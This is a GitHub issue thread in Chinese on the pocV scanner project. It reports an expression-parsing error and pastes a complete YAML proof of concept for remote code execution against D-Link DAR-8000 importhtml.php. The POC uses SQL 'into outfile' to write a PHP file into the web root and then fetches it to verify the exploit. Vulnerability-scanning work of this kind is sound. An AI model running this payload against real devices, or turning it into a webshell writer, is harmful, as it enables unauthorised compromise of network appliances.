### ISSUE TITLE
部分poc会报错 Evalaute expression error

### ISSUE THREAD

**Issue by shadow1ng** [WAY29/pocV#10]
![image](https://user-images.githubusercontent.com/39651966/169484120-8006977e-7aa2-4eac-9477-fcac88ceca7c.png)

content变量解析失败 

poc文件如下
```
name: poc-yaml-dlink-dar8000-importhtml.php-rce
transport: http
set:
  filename: randomLowercase(8)
  # <?php echo md5(114514);?>
  content: select 0x3c3f706870206563686f206d643528313134353134293b3f3e into outfile '/usr/hddocs/nsg/app/{{filename}}.php'
  payload: base64(content)
rules:
  r1:
    request:
      cache: true
      method: GET
      path: /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql={{payload}}
      headers: {}
      follow_redirects: false
    expression: |
      response.status==200
  r2:
    request:
      cache: true
      method: GET
      path: /app/{{filename}}.php
      headers: {}
      body: ""
      follow_redirects: false
    expression: |
      response.status==200 && response.body.bcontains(bytes(md5("114514")))
expression: r1() && r2()
detail:
  author: name(link)
  links:
  - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/D-Link/D-Link%20DAR-8000%20importhtml.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  fingerprint:
    infos: []
    host_info:
      hostname: ""
  vulnerability:
    id: ""
    match: ""
  description: ""
  version: ""
  tags: test, test2
```
